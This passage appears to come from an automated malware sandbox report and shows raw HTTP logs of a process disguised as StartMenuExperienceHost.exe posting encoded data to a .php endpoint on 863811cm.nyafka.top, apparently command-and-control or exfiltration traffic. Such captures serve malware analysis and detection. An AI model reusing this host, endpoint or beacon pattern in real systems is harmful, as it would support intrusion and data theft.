                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 3014
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:50.537672997 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:50.537909031 CEST3014OUTData Raw: 2d 2d 2d 2d 2d 2d 64 64 6e 38 71 50 47 4f 44 63 4c 75 32 79 64 35 74 73 70 74 6b 57 42 78 73 69 4d 71 4e 73 65 70 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                Data Ascii: ------ddn8qPGODcLu2yd5tsptkWBxsiMqNsep61Content-Disposition: form-data; name="0"Content-Type: text/plainU]X]T[]T^ZUXQSZRW_XZUUQ\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^P
                                                                Oct 11, 2024 01:36:50.937510967 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:50 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6JHD1qJ9uihtaRAvjhb7BEPOKuOvy5HIZd6P4MTsbVf0DFyO0RDZT8GMMEeHYPmWMKir8nxgK6gQgNJLgcSj3gPnFOq4maPDYeYMo7geZyZdnmVpKqB6doY%2BcJ3%2BZksnf%2FKJcU4V"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f5389cf4334-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:50.938324928 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:51.032967091 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:51.033221006 CEST2584OUTData Raw: 50 5e 5d 58 51 58 58 5f 5e 5a 55 58 51 50 5a 5f 57 5f 58 5f 55 53 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^]XQXX_^ZUXQPZ_W_X_USQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+=$?%.B*&##8#?3! 01V> 5! )#Y$/\*5
                                                                Oct 11, 2024 01:36:51.284944057 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FcDrAXXnJ0M3t%2FwZ%2BHrITsQfS1zzQ3ZgAX3gP2SSr6hpoaetCUfCEXxRCOwV04bgxRcBQ0iWRSo50ky2NPGqKOENBV2EKSl5rwHLmJJFQsS87GqN2QTsHDhlvq%2FQ%2Fsm9sqLWpxJQ"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f56ad854334-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.549925188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:50.604242086 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1984
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:50.957241058 CEST1984OUTData Raw: 50 58 5d 5c 54 58 58 56 5e 5a 55 58 51 56 5a 5d 57 5e 58 5e 55 57 51 53 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PX]\TXXV^ZUXQVZ]W^X^UWQSXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9([4>9'%-0+C(#(,<=7' $*(+52,>;#Y$/\*-
                                                                Oct 11, 2024 01:36:51.048635006 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:51.330601931 CEST748INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:51 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OxdPeZYu6bFAOAjloUUK5jKGZ%2B%2Bz1HzeaCFEs4HSoSW9bV1XWJCQsdg5Jxxp1zbyvBM%2BovYAaodCvA%2FaLxxxoT1fg8BunH6BvF9Cw8VK2d6fRNmynkURVBxfrUiSnjBrFM%2B812lV"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f56cadc41f9-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5d 3d 3a 3d 0e 20 10 30 04 2c 31 0a 10 2b 2e 3d 07 28 1f 0a 00 26 42 27 15 39 3c 3d 1c 36 02 30 5f 2a 3c 26 59 27 02 3b 58 2b 0b 2a 51 03 1b 3a 06 3c 55 24 08 28 32 39 5e 3f 31 2d 5e 33 23 1c 1a 3d 13 22 0e 33 3e 3d 07 22 57 23 0f 3e 02 09 53 3b 05 2c 1a 3d 28 00 10 23 01 2a 5f 08 13 39 1c 2a 16 01 0f 36 09 3a 04 23 3d 37 1d 21 3a 3a 50 2a 29 22 1e 25 33 0a 1a 2c 32 28 1d 37 11 0a 0f 36 05 36 56 34 04 30 59 25 28 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98']=:= 0,1+.=(&B'9<=60_*<&Y';X+*Q:<U$(29^?1-^3#="3>="W#>S;,=(#*_9*6:#=7!::P*)"%3,2(766V40Y%("_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.549931188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:51.439862967 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:51.785511971 CEST2584OUTData Raw: 50 5a 58 59 54 5e 5d 52 5e 5a 55 58 51 56 5a 5e 57 50 58 55 55 56 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PZXYT^]R^ZUXQVZ^WPXUUVQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9+[?\<2.,E*%(5)3)4$$$)(G5";)#Y$/\*-
                                                                Oct 11, 2024 01:36:51.893913984 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:52.134604931 CEST597INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3hYT9h%2FFFb7HBEw%2BiG70wNjdbwSKgpKxrUgaieprlXazFgU82UAy2%2BU9GokIzSUmdOGmtwcYIdpki8ppOLqTvRg15XBHsxq5h2JPRMJ%2Btk2EKCox2KSYAjAokqXd6bGZoGxVPvV8"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f5c0e6f438d-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.549932188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:51.465924025 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:51.816747904 CEST2004OUTData Raw: 55 59 5d 59 54 55 58 52 5e 5a 55 58 51 5d 5a 5b 57 50 58 58 55 55 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UY]YTUXR^ZUXQ]Z[WPXXUUQ\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9(-<Y>:;2-$D(6(#]<#*#4#Q'-)=;8!<[(;#Y$/\*
                                                                Oct 11, 2024 01:36:51.922998905 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:52.175071955 CEST744INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=stD063V6HNNteM5kzGUiQ3mfKavjTE9kIO1%2FZd0nmV1BuDnNpzLjEEJaq7czm1dNfjtOv66doAYyY4KVDEgNZ5rmwCvCQD2aaW5kEgA%2FyrPlpPq8dcsL4gk7mtPUvl%2BQUpaRUjWl"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f5c28325e78-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 14 3e 5f 2e 10 23 2d 23 11 3b 31 0e 10 2b 3d 21 05 3f 32 2c 00 31 24 3c 00 2d 2c 0b 11 23 2b 0e 59 28 2f 3d 02 26 2f 37 5c 29 21 2a 51 03 1b 39 5a 3c 1d 34 09 28 0c 03 5a 2b 32 0b 5e 33 23 36 1c 2b 3d 22 08 25 3e 3d 00 36 21 34 1c 29 05 24 0b 2d 3b 05 41 29 28 03 03 23 3b 2a 5f 08 13 3a 0e 2a 06 2b 0f 21 19 29 14 21 3d 38 0b 35 29 36 57 2a 29 03 0f 24 0a 2c 5d 2f 0c 2b 07 20 3c 2b 57 35 05 36 57 23 03 0d 04 31 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'>_.#-#;1+=!?2,1$<-,#+Y(/=&/7\)!*Q9Z<4(Z+2^3#6+="%>=6!4)$-;A)(#;*_:*+!)!=85)6W*)$,]/+ <+W56W#18"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.549938188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:52.255093098 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:52.613486052 CEST2584OUTData Raw: 50 59 58 5f 51 5e 58 52 5e 5a 55 58 51 56 5a 53 57 5b 58 5d 55 55 51 5a 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PYX_Q^XR^ZUXQVZSW[X]UUQZXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9^+-X?)?1>B+5/"(#]+6 4($%T*8C5$*#Y$/\*-
                                                                Oct 11, 2024 01:36:52.644638062 CEST1236OUTData Raw: 33 2c 51 14 33 58 5a 1f 08 57 3f 2e 05 20 30 0e 03 3a 0d 42 34 3b 1b 2f 0b 3d 5a 2c 3c 3d 14 08 36 5c 2b 50 3b 36 3e 27 21 2c 1e 2e 35 5f 07 2c 22 28 00 55 3e 0c 3b 1f 2f 0d 58 5c 3d 3f 30 2b 0d 3d 2d 16 37 03 2f 5d 0c 06 25 1c 3f 3e 0f 25 37 57
                                                                Data Ascii: 3,Q3XZW?. 0:B4;/=Z,<=6\+P;6>'!,.5_,"(U>;/X\=?0+=-7/]%?>%7W&<;+1?1+>:\S1$[?"$9ZZ9<7+,/*0,20#/: !0&8@[<X49T<1Y ?/#'6+? ,Y914??3+>3(:<&-]>1/"? :$)!$"<2
                                                                Oct 11, 2024 01:36:52.699776888 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:52.992175102 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nBkS5xQeUzoVOBD6BkVRMb5KvioGrABUceViQuihwFO9nplZvwKJKihCNLZVMCTaE8Ewd22XcyL11vNfjV9Glz%2FBReMtulYYTG40cta%2FogY5ASzTZGkghu0cTrmkg%2Fj3oOv8HKZm"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f611baf0f47-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.549939188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:52.291209936 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:52.644643068 CEST2004OUTData Raw: 50 5b 5d 5e 51 5c 58 51 5e 5a 55 58 51 5d 5a 5e 57 5b 58 55 55 5d 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]^Q\XQ^ZUXQ]Z^W[XUU]QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9Y+=4+:#&-8E*50\"( ?.!$0!)86W;=;#Y$/\*
                                                                Oct 11, 2024 01:36:52.750027895 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:52.997571945 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:52 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpZZUsF1hP0fer%2FWf%2B0VPQfITmKWlw9B%2FE%2FwHa6Wevu6pFBVugyPdCO1OkZtDgWQmSzDZARDOmxV4ZfHy2oJsEQEO4M2MiQfRk38kl7KVRCT2UYYIFVKAHbvNI1KvD0HaRk2MuFf"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f61689742ef-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 3d 07 32 53 20 07 3f 11 2f 0f 28 10 3d 13 2e 1b 29 31 23 5f 25 27 37 5d 2d 05 26 0e 35 3b 02 1a 2a 3c 04 5f 27 05 27 5c 29 31 2a 51 03 1b 3a 00 3f 33 01 57 2b 31 39 5d 3f 32 3d 59 26 30 29 0b 3e 03 00 0f 24 00 2a 5e 35 32 27 0f 3e 02 24 0c 3b 05 3f 0a 29 5e 3e 58 21 3b 2a 5f 08 13 39 55 3d 3b 28 1c 21 24 26 01 36 3d 3c 0b 22 39 04 19 29 07 0c 56 27 23 20 15 3b 0c 37 03 20 2f 0d 50 22 5a 3d 0a 20 13 2c 59 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$=2S ?/(=.)1#_%'7]-&5;*<_''\)1*Q:?3W+19]?2=Y&0)>$*^52'>$;?)^>X!;*_9U=;(!$&6=<"9)V'# ;7 /P"Z= ,Y&"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                35192.168.2.549945188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:53.117136002 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:53.472795963 CEST2584OUTData Raw: 50 5e 58 5a 54 58 58 50 5e 5a 55 58 51 57 5a 5c 57 5d 58 5d 55 5d 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P^XZTXXP^ZUXQWZ\W]X]U]Q[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9?[#?932=,? "++(-T47?':=,A 1>#Y$/\*)
                                                                Oct 11, 2024 01:36:53.570585966 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:53.808367968 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eB%2BiCuJouilxJ31skrB4O9TXLjhPI%2ByagWM9QAxcMmiy6lm07msnClDR0NxTLD6Z3MsBDv2PyQQ%2FT0p122KdeUqHvH0iOUfAcXQ08qR6o3l5oWfoWWPTwQuw7vAvBLCmVb8DiA73"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f668e624394-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                36192.168.2.549946188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:53.120106936 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 1992
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:36:53.472795963 CEST1992OUTData Raw: 50 52 5d 5e 54 5f 58 5f 5e 5a 55 58 51 55 5a 5e 57 5a 58 5f 55 56 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR]^T_X_^ZUXQUZ^WZX_UVQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:)-X<98&.8B?Y!<3477W01V),!2,=;#Y$/\*1
                                                                Oct 11, 2024 01:36:53.565300941 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:53.802253962 CEST752INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:53 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FNXYd5BOSDN%2FFwgPJPqAZMUOIUROnFJxvwVr%2FRjq6Dd61Leh1oQYrEx9jEXTxe7r8M7USCvJCX2WVDUxn1L%2FlnJ5%2FnlDP%2Bejr%2B1pk1CC%2FoKdmYCqfFHQnXM4JUqpFgvUd74FcMAt"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f667dcd4402-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 5f 28 3a 3e 53 20 3e 27 5b 2c 1f 0e 13 2b 2d 2e 5e 29 22 2c 01 26 1d 3b 15 2c 3c 26 0a 22 38 2f 00 3d 3c 36 58 30 05 3b 5c 3c 0b 2a 51 03 1b 3a 01 28 33 3b 54 28 0c 2e 02 3c 22 31 17 30 0d 31 0b 29 03 3d 56 30 2e 25 00 23 32 3f 0b 3e 3c 28 0a 2c 38 20 1d 3e 16 39 02 37 3b 2a 5f 08 13 3a 0f 2a 5e 37 08 22 37 29 1a 22 13 1e 0f 36 3a 25 08 3d 00 2e 13 24 55 20 5c 2d 31 34 5b 34 2c 33 1d 21 2f 32 53 20 03 24 5a 26 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'_(:>S >'[,+-.^)",&;,<&"8/=<6X0;\<*Q:(3;T(.<"101)=V0.%#2?><(,8 >97;*_:*^7"7)"6:%=.$U \-14[4,3!/2S $Z&8"_")Q?TR0
                                                                Oct 11, 2024 01:36:53.911685944 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:54.006052971 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:54.007250071 CEST2004OUTData Raw: 55 59 5d 5d 54 59 58 50 5e 5a 55 58 51 57 5a 5f 57 5d 58 5a 55 5c 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
